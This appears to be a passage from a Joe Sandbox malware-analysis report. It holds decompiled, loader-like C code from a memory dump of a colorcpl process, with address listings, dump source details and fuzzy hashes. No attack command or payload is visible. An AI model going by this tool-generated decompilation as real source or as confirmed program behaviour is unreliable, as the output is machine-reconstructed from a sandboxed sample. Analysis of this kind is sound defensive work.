                                                                                                								_t384 = _t287 -  *0x6f07b90; // 0x77090000
                                                                                                								if(_t384 == 0) {
                                                                                                									_t353 =  *0x6f07b8c; // 0xe22bb8
                                                                                                									_v176 = _t353;
                                                                                                									_t320 = ( *(_t353 + 0x50))[8];
                                                                                                									_v184 = _t320;
                                                                                                								} else {
                                                                                                									E06E32280(_t200, 0x6f084d8);
                                                                                                									_t277 =  *0x6f085f4; // 0xe29940
                                                                                                									_t351 =  *0x6f085f8 & 1;
                                                                                                									while(_t277 != 0) {
                                                                                                										_t337 =  *(_t277 - 0x50);
                                                                                                										if(_t337 > _t287) {
                                                                                                											_t338 = _t337 | 0xffffffff;
                                                                                                										} else {
                                                                                                											asm("sbb ecx, ecx");
                                                                                                											_t338 =  ~_t337;
                                                                                                										}
                                                                                                										_t387 = _t338;
                                                                                                										if(_t387 < 0) {
                                                                                                											_t339 =  *_t277;
                                                                                                											__eflags = _t351;
                                                                                                											if(_t351 != 0) {
                                                                                                												__eflags = _t339;
                                                                                                												if(_t339 == 0) {
                                                                                                													goto L16;
                                                                                                												} else {
                                                                                                													goto L118;
                                                                                                												}
                                                                                                												goto L151;
                                                                                                											} else {
                                                                                                												goto L16;
                                                                                                											}
                                                                                                											goto L17;
                                                                                                										} else {
                                                                                                											if(_t387 <= 0) {
                                                                                                												__eflags = _t277;
                                                                                                												if(_t277 != 0) {
                                                                                                													_t340 =  *(_t277 - 0x18);
                                                                                                													_t24 = _t277 - 0x68; // 0xe298d8
                                                                                                													_t353 = _t24;
                                                                                                													_v176 = _t353;
                                                                                                													__eflags = _t340[3] - 0xffffffff;
                                                                                                													if(_t340[3] != 0xffffffff) {
                                                                                                														_t279 =  *_t340;
                                                                                                														__eflags =  *(_t279 - 0x20) & 0x00000020;
                                                                                                														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                                                                                                															asm("lock inc dword [edi+0x9c]");
                                                                                                															_t340 =  *(_t353 + 0x50);
                                                                                                														}
                                                                                                													}
                                                                                                													_v184 = _t340[8];
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t339 =  *(_t277 + 4);
                                                                                                												if(_t351 != 0) {
                                                                                                													__eflags = _t339;
                                                                                                													if(_t339 == 0) {
                                                                                                														goto L16;
                                                                                                													} else {
                                                                                                														L118:
                                                                                                														_t277 = _t277 ^ _t339;
                                                                                                														goto L17;
                                                                                                													}
                                                                                                													goto L151;
                                                                                                												} else {
                                                                                                													L16:
                                                                                                													_t277 = _t339;
                                                                                                												}
                                                                                                												goto L17;
                                                                                                											}
                                                                                                										}
                                                                                                										goto L25;
                                                                                                										L17:
                                                                                                									}
                                                                                                									L25:
                                                                                                									E06E2FFB0(_t287, _t353, 0x6f084d8);
                                                                                                									_t320 = _v184;
                                                                                                									_t342 = 0x1000;
                                                                                                								}
                                                                                                								if(_t353 == 0) {
                                                                                                									break;
                                                                                                								} else {
                                                                                                									_t366 = 0;
                                                                                                									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                                                                                                										_t288 = _v164;
                                                                                                										if(_t353 != 0) {
                                                                                                											_t342 = _t288;
                                                                                                											_t374 = E06E6CC99(_t353, _t288, _v200, 1,  &_v168);
                                                                                                											if(_t374 >= 0) {
                                                                                                												if(_v184 == 7) {
                                                                                                													__eflags = _a20;
                                                                                                													if(__eflags == 0) {
                                                                                                														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                                                                                                														if(__eflags != 0) {
                                                                                                															_t271 = E06E26600(0x6f052d8);
                                                                                                															__eflags = _t271;
                                                                                                															if(__eflags == 0) {
                                                                                                																_t342 = 0;
                                                                                                																_v169 = _t271;
                                                                                                																_t374 = E06E27926( *(_t353 + 0x50), 0,  &_v169);
                                                                                                															}
                                                                                                														}
                                                                                                													}
                                                                                                												}
                                                                                                												if(_t374 < 0) {
                                                                                                													_v168 = 0;
                                                                                                												} else {
                                                                                                													if( *0x6f0b239 != 0) {
                                                                                                														_t342 =  *(_t353 + 0x18);
                                                                                                														E06E9E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                                                                                                													}
                                                                                                													if( *0x6f08472 != 0) {
                                                                                                														_v192 = 0;
                                                                                                														_t342 =  *0x7ffe0330;
                                                                                                														_t361 =  *0x6f0b218; // 0x0
                                                                                                														asm("ror edi, cl");
                                                                                                														 *0x6f0b1e0( &_v192, _t353, _v168, 0, _v180);
                                                                                                														 *(_t361 ^  *0x7ffe0330)();
                                                                                                														_t269 = _v192;
                                                                                                														_t353 = _v176;
                                                                                                														__eflags = _t269;
                                                                                                														if(__eflags != 0) {
                                                                                                															_v168 = _t269;
                                                                                                														}
                                                                                                													}
                                                                                                												}
                                                                                                											}
                                                                                                											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                                                                                                												_t366 = 0xc000007a;
                                                                                                											}
                                                                                                											_t247 =  *(_t353 + 0x50);
                                                                                                											if(_t247[3] == 0xffffffff) {
                                                                                                												L40:
                                                                                                												if(_t366 == 0xc000007a) {
                                                                                                													__eflags = _t288;
                                                                                                													if(_t288 == 0) {
                                                                                                														goto L136;
                                                                                                													} else {
                                                                                                														_t366 = 0xc0000139;
                                                                                                													}
                                                                                                													goto L54;
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t249 =  *_t247;
                                                                                                												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                                                                                                													goto L40;
                                                                                                												} else {
                                                                                                													_t250 = _t249 | 0xffffffff;
                                                                                                													asm("lock xadd [edi+0x9c], eax");
                                                                                                													if((_t249 | 0xffffffff) == 0) {
                                                                                                														E06E32280(_t250, 0x6f084d8);
                                                                                                														_t342 =  *(_t353 + 0x54);
                                                                                                														_t165 = _t353 + 0x54; // 0x54
                                                                                                														_t252 = _t165;
                                                                                                														__eflags =  *(_t342 + 4) - _t252;
                                                                                                														if( *(_t342 + 4) != _t252) {
                                                                                                															L135:
                                                                                                															asm("int 0x29");
                                                                                                															L136:
                                                                                                															_t288 = _v200;
                                                                                                															_t366 = 0xc0000138;
                                                                                                															L54:
                                                                                                															_t342 = _t288;
                                                                                                															L06E53898(0, _t288, _t366);
                                                                                                														} else {
                                                                                                															_t324 =  *(_t252 + 4);
                                                                                                															__eflags =  *_t324 - _t252;
                                                                                                															if( *_t324 != _t252) {
                                                                                                																goto L135;
                                                                                                															} else {
                                                                                                																 *_t324 = _t342;
                                                                                                																 *(_t342 + 4) = _t324;
                                                                                                																_t293 =  *(_t353 + 0x50);
                                                                                                																_v180 =  *_t293;
                                                                                                																E06E2FFB0(_t293, _t353, 0x6f084d8);
                                                                                                																__eflags =  *((short*)(_t353 + 0x3a));
                                                                                                																if( *((short*)(_t353 + 0x3a)) != 0) {
                                                                                                																	_t342 = 0;
                                                                                                																	__eflags = 0;
                                                                                                																	E06E537F5(_t353, 0);
                                                                                                																}
                                                                                                																E06E50413(_t353);
                                                                                                																_t256 =  *(_t353 + 0x48);
                                                                                                																__eflags = _t256;
                                                                                                																if(_t256 != 0) {
                                                                                                																	__eflags = _t256 - 0xffffffff;
                                                                                                																	if(_t256 != 0xffffffff) {
                                                                                                																		E06E49B10(_t256);
                                                                                                																	}
                                                                                                																}
                                                                                                																__eflags =  *(_t353 + 0x28);
                                                                                                																if( *(_t353 + 0x28) != 0) {
                                                                                                																	_t174 = _t353 + 0x24; // 0x24
                                                                                                																	E06E402D6(_t174);
                                                                                                																}
                                                                                                																L06E377F0( *0x6f07b98, 0, _t353);
                                                                                                																__eflags = _v180 - _t293;
                                                                                                																if(__eflags == 0) {
                                                                                                																	E06E4C277(_t293, _t366);
                                                                                                																}
                                                                                                																_t288 = _v164;
                                                                                                																goto L40;
                                                                                                															}
                                                                                                														}
                                                                                                													} else {
                                                                                                														goto L40;
                                                                                                													}
                                                                                                												}
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										L06E2EC7F(_t353);
                                                                                                										L06E419B8(_t287, 0, _t353, 0);
                                                                                                										_t200 = E06E1F4E3(__eflags);
                                                                                                										continue;
                                                                                                									}
                                                                                                								}
                                                                                                								L41:
                                                                                                								if(_v157 != 0) {
                                                                                                									L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                                                                                                								}
                                                                                                								if(_t366 < 0) {
                                                                                                									L46:
                                                                                                									 *_v212 = _v168;
                                                                                                									_t204 = _t366;
                                                                                                									L47:
                                                                                                									_pop(_t354);
                                                                                                									_pop(_t367);
                                                                                                									_pop(_t289);
                                                                                                									return E06E5B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                                                                                                								} else {
                                                                                                									_t206 =  *0x6f0b2f8; // 0x1160000
                                                                                                									if((_t206 |  *0x6f0b2fc) == 0 || ( *0x6f0b2e4 & 0x00000001) != 0) {
                                                                                                										goto L46;
                                                                                                									} else {
                                                                                                										_t297 =  *0x6f0b2ec; // 0x100
                                                                                                										_v200 = 0;
                                                                                                										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
                                                                                                											_t355 = _v168;
                                                                                                											_t342 =  &_v208;
                                                                                                											_t208 = E06EC6B68(_v168,  &_v208, _v168, __eflags);
                                                                                                											__eflags = _t208 - 1;
                                                                                                											if(_t208 == 1) {
                                                                                                												goto L46;
                                                                                                											} else {
                                                                                                												__eflags = _v208 & 0x00000010;
                                                                                                												if((_v208 & 0x00000010) == 0) {
                                                                                                													goto L46;
                                                                                                												} else {
                                                                                                													_t342 = 4;
                                                                                                													_t366 = E06EC6AEB(_t355, 4,  &_v216);
                                                                                                													__eflags = _t366;
                                                                                                													if(_t366 >= 0) {
                                                                                                														goto L46;
                                                                                                													} else {
                                                                                                														asm("int 0x29");
                                                                                                														_t356 = 0;
                                                                                                														_v44 = 0;
                                                                                                														_t290 = _v52;
                                                                                                														__eflags = 0;
                                                                                                														if(0 == 0) {
                                                                                                															L108:
                                                                                                															_t356 = 0;
                                                                                                															_v44 = 0;
                                                                                                															goto L63;
                                                                                                														} else {
                                                                                                															__eflags = 0;
                                                                                                															if(0 < 0) {
                                                                                                																goto L108;
                                                                                                															}
                                                                                                															L63:
                                                                                                															_v112 = _t356;
                                                                                                															__eflags = _t356;
                                                                                                															if(_t356 == 0) {
                                                                                                																L143:
                                                                                                																_v8 = 0xfffffffe;
                                                                                                																_t211 = 0xc0000089;
                                                                                                															} else {
                                                                                                																_v36 = 0;
                                                                                                																_v60 = 0;
                                                                                                																_v48 = 0;
                                                                                                																_v68 = 0;
                                                                                                																_v44 = _t290 & 0xfffffffc;
                                                                                                																E06E2E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                                                                                                																_t306 = _v68;
                                                                                                																__eflags = _t306;
                                                                                                																if(_t306 == 0) {
                                                                                                																	_t216 = 0xc000007b;
                                                                                                																	_v36 = 0xc000007b;
                                                                                                																	_t307 = _v60;
                                                                                                																} else {
                                                                                                																	__eflags = _t290 & 0x00000001;
                                                                                                																	if(__eflags == 0) {
                                                                                                																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                                                                                                																		__eflags = _t349 - 0x10b;
                                                                                                																		if(_t349 != 0x10b) {
                                                                                                																			__eflags = _t349 - 0x20b;
                                                                                                																			if(_t349 == 0x20b) {
                                                                                                																				goto L102;
                                                                                                																			} else {
                                                                                                																				_t307 = 0;
                                                                                                																				_v48 = 0;
                                                                                                																				_t216 = 0xc000007b;
                                                                                                																				_v36 = 0xc000007b;
                                                                                                																				goto L71;
                                                                                                																			}
                                                                                                																		} else {
                                                                                                																			L102:
                                                                                                																			_t307 =  *(_t306 + 0x50);
                                                                                                																			goto L69;
                                                                                                																		}
                                                                                                																		goto L151;
                                                                                                																	} else {
                                                                                                																		_t239 = L06E2EAEA(_t290, _t290, _t356, _t366, __eflags);
                                                                                                																		_t307 = _t239;
                                                                                                																		_v60 = _t307;
                                                                                                																		_v48 = _t307;
                                                                                                																		__eflags = _t307;
                                                                                                																		if(_t307 != 0) {
                                                                                                																			L70:
                                                                                                																			_t216 = _v36;
                                                                                                																		} else {
                                                                                                																			_push(_t239);
                                                                                                																			_push(0x14);
                                                                                                																			_push( &_v144);
                                                                                                																			_push(3);
                                                                                                																			_push(_v44);
                                                                                                																			_push(0xffffffff);
                                                                                                																			_t319 = E06E59730();
                                                                                                																			_v36 = _t319;
                                                                                                																			__eflags = _t319;
                                                                                                																			if(_t319 < 0) {
                                                                                                																				_t216 = 0xc000001f;
                                                                                                																				_v36 = 0xc000001f;
                                                                                                																				_t307 = _v60;
                                                                                                																			} else {
                                                                                                																				_t307 = _v132;
                                                                                                																				L69:
                                                                                                																				_v48 = _t307;
                                                                                                																				goto L70;
                                                                                                																			}
                                                                                                																		}
                                                                                                																	}
                                                                                                																}
                                                                                                																L71:
                                                                                                																_v72 = _t307;
                                                                                                																_v84 = _t216;
                                                                                                																__eflags = _t216 - 0xc000007b;
                                                                                                																if(_t216 == 0xc000007b) {
                                                                                                																	L150:
                                                                                                																	_v8 = 0xfffffffe;
                                                                                                																	_t211 = 0xc000007b;
                                                                                                																} else {
                                                                                                																	_t344 = _t290 & 0xfffffffc;
                                                                                                																	_v76 = _t344;
                                                                                                																	__eflags = _v40 - _t344;
                                                                                                																	if(_v40 <= _t344) {
                                                                                                																		goto L150;
                                                                                                																	} else {
                                                                                                																		__eflags = _t307;
                                                                                                																		if(_t307 == 0) {
                                                                                                																			L75:
                                                                                                																			_t217 = 0;
                                                                                                																			_v104 = 0;
                                                                                                																			__eflags = _t366;
                                                                                                																			if(_t366 != 0) {
                                                                                                																				__eflags = _t290 & 0x00000001;
                                                                                                																				if((_t290 & 0x00000001) != 0) {
                                                                                                																					_t217 = 1;
                                                                                                																					_v104 = 1;
                                                                                                																				}
                                                                                                																				_t290 = _v44;
                                                                                                																				_v52 = _t290;
                                                                                                																			}
                                                                                                																			__eflags = _t217 - 1;
                                                                                                																			if(_t217 != 1) {
                                                                                                																				_t369 = 0;
                                                                                                																				_t218 = _v40;
                                                                                                																				goto L91;
                                                                                                																			} else {
                                                                                                																				_v64 = 0;
                                                                                                																				E06E2E9C0(1, _t290, 0, 0,  &_v64);
                                                                                                																				_t309 = _v64;
                                                                                                																				_v108 = _t309;
                                                                                                																				__eflags = _t309;
                                                                                                																				if(_t309 == 0) {
                                                                                                																					goto L143;
                                                                                                																				} else {
                                                                                                																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                                                                                                																					__eflags = _t226 - 0x10b;
                                                                                                																					if(_t226 != 0x10b) {
                                                                                                																						__eflags = _t226 - 0x20b;
                                                                                                																						if(_t226 != 0x20b) {
                                                                                                																							goto L143;
                                                                                                																						} else {
                                                                                                																							_t371 =  *(_t309 + 0x98);
                                                                                                																							goto L83;
                                                                                                																						}
                                                                                                																					} else {
                                                                                                																						_t371 =  *(_t309 + 0x88);
                                                                                                																						L83:
                                                                                                																						__eflags = _t371;
                                                                                                																						if(_t371 != 0) {
                                                                                                																							_v80 = _t371 - _t356 + _t290;
                                                                                                																							_t310 = _v64;
                                                                                                																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                                                                                                																							_t292 =  *(_t310 + 6) & 0x0000ffff;
                                                                                                																							_t311 = 0;
                                                                                                																							__eflags = 0;
                                                                                                																							while(1) {
                                                                                                																								_v120 = _t311;
                                                                                                																								_v116 = _t348;
                                                                                                																								__eflags = _t311 - _t292;
                                                                                                																								if(_t311 >= _t292) {
                                                                                                																									goto L143;
                                                                                                																								}
                                                                                                																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
                                                                                                																								__eflags = _t371 - _t359;
                                                                                                																								if(_t371 < _t359) {
                                                                                                																									L98:
                                                                                                																									_t348 = _t348 + 0x28;
                                                                                                																									_t311 = _t311 + 1;
                                                                                                																									continue;
                                                                                                																								} else {
                                                                                                																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                                                                                                																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                                                                                                																										goto L98;
                                                                                                																									} else {
                                                                                                																										__eflags = _t348;
                                                                                                																										if(_t348 == 0) {
                                                                                                																											goto L143;
                                                                                                																										} else {
                                                                                                																											_t218 = _v40;
                                                                                                																											_t312 =  *_t218;
                                                                                                																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                                                                                                																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                                                                                                																												_v100 = _t359;
                                                                                                																												_t360 = _v108;
                                                                                                																												_t372 = L06E28F44(_v108, _t312);
                                                                                                																												__eflags = _t372;
                                                                                                																												if(_t372 == 0) {
                                                                                                																													goto L143;
                                                                                                																												} else {
                                                                                                																													_t290 = _v52;
                                                                                                																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E06E53C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                                                                                                																													_t307 = _v72;
                                                                                                																													_t344 = _v76;
                                                                                                																													_t218 = _v40;
                                                                                                																													goto L91;
                                                                                                																												}
                                                                                                																											} else {
                                                                                                																												_t290 = _v52;
                                                                                                																												_t307 = _v72;
                                                                                                																												_t344 = _v76;
                                                                                                																												_t369 = _v80;
                                                                                                																												L91:
                                                                                                																												_t358 = _a4;
                                                                                                																												__eflags = _t358;
                                                                                                																												if(_t358 == 0) {
                                                                                                																													L95:
                                                                                                																													_t308 = _a8;
                                                                                                																													__eflags = _t308;
                                                                                                																													if(_t308 != 0) {
                                                                                                																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
                                                                                                																													}
                                                                                                																													_v8 = 0xfffffffe;
                                                                                                																													_t211 = _v84;
                                                                                                																												} else {
                                                                                                																													_t370 =  *_t218 - _t369 + _t290;
                                                                                                																													 *_t358 = _t370;
                                                                                                																													__eflags = _t370 - _t344;
                                                                                                																													if(_t370 <= _t344) {
                                                                                                																														L149:
                                                                                                																														 *_t358 = 0;
                                                                                                																														goto L150;
                                                                                                																													} else {
                                                                                                																														__eflags = _t307;
                                                                                                																														if(_t307 == 0) {
                                                                                                																															goto L95;
                                                                                                																														} else {
                                                                                                																															__eflags = _t370 - _t344 + _t307;
                                                                                                																															if(_t370 >= _t344 + _t307) {
                                                                                                																																goto L149;
                                                                                                																															} else {
                                                                                                																																goto L95;
                                                                                                																															}
                                                                                                																														}
                                                                                                																													}
                                                                                                																												}
                                                                                                																											}
                                                                                                																										}
                                                                                                																									}
                                                                                                																								}
                                                                                                																								goto L97;
                                                                                                																							}
                                                                                                																						}
                                                                                                																						goto L143;
                                                                                                																					}
                                                                                                																				}
                                                                                                																			}
                                                                                                																		} else {
                                                                                                																			__eflags = _v40 - _t307 + _t344;
                                                                                                																			if(_v40 >= _t307 + _t344) {
                                                                                                																				goto L150;
                                                                                                																			} else {
                                                                                                																				goto L75;
                                                                                                																			}
                                                                                                																		}
                                                                                                																	}
                                                                                                																}
                                                                                                															}
                                                                                                															L97:
                                                                                                															 *[fs:0x0] = _v20;
                                                                                                															return _t211;
                                                                                                														}
                                                                                                													}
                                                                                                												}
                                                                                                											}
                                                                                                										} else {
                                                                                                											goto L46;
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                								goto L151;
                                                                                                							}
                                                                                                							_t288 = _v164;
                                                                                                							_t366 = 0xc0000135;
                                                                                                							goto L41;
                                                                                                						}
                                                                                                					}
                                                                                                				}
                                                                                                				L151:
                                                                                                			}
                                                                                                0x06e2d6bb
                                                                                                0x06e2d6bd
                                                                                                0x06e2d6ce
                                                                                                0x06e2d6d0
                                                                                                0x06e2d6d2
                                                                                                0x06e7b363
                                                                                                0x06e7b365
                                                                                                0x00000000
                                                                                                0x06e7b36b
                                                                                                0x00000000
                                                                                                0x06e7b36b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e2d6bf
                                                                                                0x06e2d6bf
                                                                                                0x06e2d6e5
                                                                                                0x06e2d6e7
                                                                                                0x06e2d6e9
                                                                                                0x06e2d6ec
                                                                                                0x06e2d6ec
                                                                                                0x06e2d6ef
                                                                                                0x06e2d6f5
                                                                                                0x06e2d6f9
                                                                                                0x06e2d6fb
                                                                                                0x06e2d6fd
                                                                                                0x06e2d701
                                                                                                0x06e2d703
                                                                                                0x06e2d70a
                                                                                                0x06e2d70a
                                                                                                0x06e2d701
                                                                                                0x06e2d710
                                                                                                0x06e2d710
                                                                                                0x06e2d6c1
                                                                                                0x06e2d6c1
                                                                                                0x06e2d6c6
                                                                                                0x06e7b36d
                                                                                                0x06e7b36f
                                                                                                0x00000000
                                                                                                0x06e7b375
                                                                                                0x06e7b375
                                                                                                0x06e7b375
                                                                                                0x00000000
                                                                                                0x06e7b375
                                                                                                0x00000000
                                                                                                0x06e2d6cc
                                                                                                0x06e2d6d8
                                                                                                0x06e2d6d8
                                                                                                0x06e2d6d8
                                                                                                0x00000000
                                                                                                0x06e2d6c6
                                                                                                0x06e2d6bf
                                                                                                0x00000000
                                                                                                0x06e2d6da
                                                                                                0x06e2d6da
                                                                                                0x06e2d716
                                                                                                0x06e2d71b
                                                                                                0x06e2d720
                                                                                                0x06e2d726
                                                                                                0x06e2d726
                                                                                                0x06e2d72d
                                                                                                0x00000000
                                                                                                0x06e2d733
                                                                                                0x06e2d739
                                                                                                0x06e2d742
                                                                                                0x06e2d750
                                                                                                0x06e2d758
                                                                                                0x06e2d764
                                                                                                0x06e2d776
                                                                                                0x06e2d77a
                                                                                                0x06e2d783
                                                                                                0x06e2d928
                                                                                                0x06e2d92c
                                                                                                0x06e2d93d
                                                                                                0x06e2d944
                                                                                                0x06e2d94f
                                                                                                0x06e2d954
                                                                                                0x06e2d956
                                                                                                0x06e2d95f
                                                                                                0x06e2d961
                                                                                                0x06e2d973
                                                                                                0x06e2d973
                                                                                                0x06e2d956
                                                                                                0x06e2d944
                                                                                                0x06e2d92c
                                                                                                0x06e2d78b
                                                                                                0x06e7b394
                                                                                                0x06e2d791
                                                                                                0x06e2d798
                                                                                                0x06e7b3a3
                                                                                                0x06e7b3bb
                                                                                                0x06e7b3bb
                                                                                                0x06e2d7a5
                                                                                                0x06e2d866
                                                                                                0x06e2d870
                                                                                                0x06e2d884
                                                                                                0x06e2d892
                                                                                                0x06e2d898
                                                                                                0x06e2d89e
                                                                                                0x06e2d8a0
                                                                                                0x06e2d8a6
                                                                                                0x06e2d8ac
                                                                                                0x06e2d8ae
                                                                                                0x06e2d8b4
                                                                                                0x06e2d8b4
                                                                                                0x06e2d8ae
                                                                                                0x06e2d7a5
                                                                                                0x06e2d78b
                                                                                                0x06e2d7b1
                                                                                                0x06e7b3c5
                                                                                                0x06e7b3c5
                                                                                                0x06e2d7c3
                                                                                                0x06e2d7ca
                                                                                                0x06e2d7e5
                                                                                                0x06e2d7eb
                                                                                                0x06e2d8eb
                                                                                                0x06e2d8ed
                                                                                                0x00000000
                                                                                                0x06e2d8f3
                                                                                                0x06e2d8f3
                                                                                                0x06e2d8f3
                                                                                                0x00000000
                                                                                                0x06e2d8ed
                                                                                                0x06e2d7cc
                                                                                                0x06e2d7cc
                                                                                                0x06e2d7d2
                                                                                                0x00000000
                                                                                                0x06e2d7d4
                                                                                                0x06e2d7d4
                                                                                                0x06e2d7d7
                                                                                                0x06e2d7df
                                                                                                0x06e7b3d4
                                                                                                0x06e7b3d9
                                                                                                0x06e7b3dc
                                                                                                0x06e7b3dc
                                                                                                0x06e7b3df
                                                                                                0x06e7b3e2
                                                                                                0x06e7b468
                                                                                                0x06e7b46d
                                                                                                0x06e7b46f
                                                                                                0x06e7b46f
                                                                                                0x06e7b475
                                                                                                0x06e2d8f8
                                                                                                0x06e2d8f9
                                                                                                0x06e2d8fd
                                                                                                0x06e7b3e8
                                                                                                0x06e7b3e8
                                                                                                0x06e7b3eb
                                                                                                0x06e7b3ed
                                                                                                0x00000000
                                                                                                0x06e7b3ef
                                                                                                0x06e7b3ef
                                                                                                0x06e7b3f1
                                                                                                0x06e7b3f4
                                                                                                0x06e7b3fe
                                                                                                0x06e7b404
                                                                                                0x06e7b409
                                                                                                0x06e7b40e
                                                                                                0x06e7b410
                                                                                                0x06e7b410
                                                                                                0x06e7b414
                                                                                                0x06e7b414
                                                                                                0x06e7b41b
                                                                                                0x06e7b420
                                                                                                0x06e7b423
                                                                                                0x06e7b425
                                                                                                0x06e7b427
                                                                                                0x06e7b42a
                                                                                                0x06e7b42d
                                                                                                0x06e7b42d
                                                                                                0x06e7b42a
                                                                                                0x06e7b432
                                                                                                0x06e7b436
                                                                                                0x06e7b438
                                                                                                0x06e7b43b
                                                                                                0x06e7b43b
                                                                                                0x06e7b449
                                                                                                0x06e7b44e
                                                                                                0x06e7b454
                                                                                                0x06e7b458
                                                                                                0x06e7b458
                                                                                                0x06e7b45d
                                                                                                0x00000000
                                                                                                0x06e7b45d
                                                                                                0x06e7b3ed
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e2d7df
                                                                                                0x06e2d7d2
                                                                                                0x06e2d7ca
                                                                                                0x06e7b37c
                                                                                                0x06e7b37e
                                                                                                0x06e7b385
                                                                                                0x06e7b38a
                                                                                                0x00000000
                                                                                                0x06e7b38a
                                                                                                0x06e2d742
                                                                                                0x06e2d7f1
                                                                                                0x06e2d7f8
                                                                                                0x06e7b49b
                                                                                                0x06e7b49b
                                                                                                0x06e2d800
                                                                                                0x06e2d837
                                                                                                0x06e2d843
                                                                                                0x06e2d845
                                                                                                0x06e2d847
                                                                                                0x06e2d84a
                                                                                                0x06e2d84b
                                                                                                0x06e2d84e
                                                                                                0x06e2d857
                                                                                                0x06e2d802
                                                                                                0x06e2d802
                                                                                                0x06e2d80d
                                                                                                0x00000000
                                                                                                0x06e2d818
                                                                                                0x06e2d818
                                                                                                0x06e2d824
                                                                                                0x06e2d831
                                                                                                0x06e7b4a5
                                                                                                0x06e7b4ab
                                                                                                0x06e7b4b3
                                                                                                0x06e7b4b8
                                                                                                0x06e7b4bb
                                                                                                0x00000000
                                                                                                0x06e7b4c1
                                                                                                0x06e7b4c1
                                                                                                0x06e7b4c8
                                                                                                0x00000000
                                                                                                0x06e7b4ce
                                                                                                0x06e7b4d4
                                                                                                0x06e7b4e1
                                                                                                0x06e7b4e3
                                                                                                0x06e7b4e5
                                                                                                0x00000000
                                                                                                0x06e7b4eb
                                                                                                0x06e7b4f0
                                                                                                0x06e7b4f2
                                                                                                0x06e2dac9
                                                                                                0x06e2dacc
                                                                                                0x06e2dacf
                                                                                                0x06e2dad1
                                                                                                0x06e2dd78
                                                                                                0x06e2dd78
                                                                                                0x06e2dcf2
                                                                                                0x00000000
                                                                                                0x06e2dad7
                                                                                                0x06e2dad9
                                                                                                0x06e2dadb
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e2dae1
                                                                                                0x06e2dae1
                                                                                                0x06e2dae4
                                                                                                0x06e2dae6
                                                                                                0x06e7b4f9
                                                                                                0x06e7b4f9
                                                                                                0x06e7b500
                                                                                                0x06e2daec
                                                                                                0x06e2daec

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 4ef6f56c03e4ae811b2187a9286d2da0c1a2c10983fb66af68f89da5ec31273e
                                                                                                • Instruction ID: cfc801dbbe3e946c4a7e1c253bb40a04c6a34d0efbd8fb968da9bfd2f4e4aba6
                                                                                                • Opcode Fuzzy Hash: 4ef6f56c03e4ae811b2187a9286d2da0c1a2c10983fb66af68f89da5ec31273e
                                                                                                • Instruction Fuzzy Hash: 0AE1D530E0036ADFEBA4DF24CD84BA9B7B7BF45308F0421A9DA1997290D7749985CF91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 86%
                                                                                                			E06E3B236(signed int __ecx, intOrPtr __edx) {
                                                                                                				unsigned int _v8;
                                                                                                				signed int _v12;
                                                                                                				unsigned int _v16;
                                                                                                				char _v20;
                                                                                                				intOrPtr _v24;
                                                                                                				intOrPtr _v28;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				unsigned int _t94;
                                                                                                				signed int _t96;
                                                                                                				intOrPtr _t97;
                                                                                                				unsigned int _t101;
                                                                                                				char _t103;
                                                                                                				signed int _t114;
                                                                                                				signed int _t115;
                                                                                                				signed char* _t118;
                                                                                                				intOrPtr _t119;
                                                                                                				signed int _t120;
                                                                                                				signed char* _t123;
                                                                                                				signed int _t129;
                                                                                                				char* _t132;
                                                                                                				unsigned int _t147;
                                                                                                				signed int _t157;
                                                                                                				unsigned int _t158;
                                                                                                				signed int _t159;
                                                                                                				signed int _t165;
                                                                                                				signed int _t168;
                                                                                                				signed char _t175;
                                                                                                				signed char _t185;
                                                                                                				unsigned int _t197;
                                                                                                				unsigned int _t206;
                                                                                                				unsigned int* _t214;
                                                                                                				signed int _t218;
                                                                                                
                                                                                                				_t156 = __edx;
                                                                                                				_v24 = __edx;
                                                                                                				_t218 = __ecx;
                                                                                                				_t3 = _t156 + 0xfff; // 0xfff
                                                                                                				_t210 = 0;
                                                                                                				_v16 = _t3 & 0xfffff000;
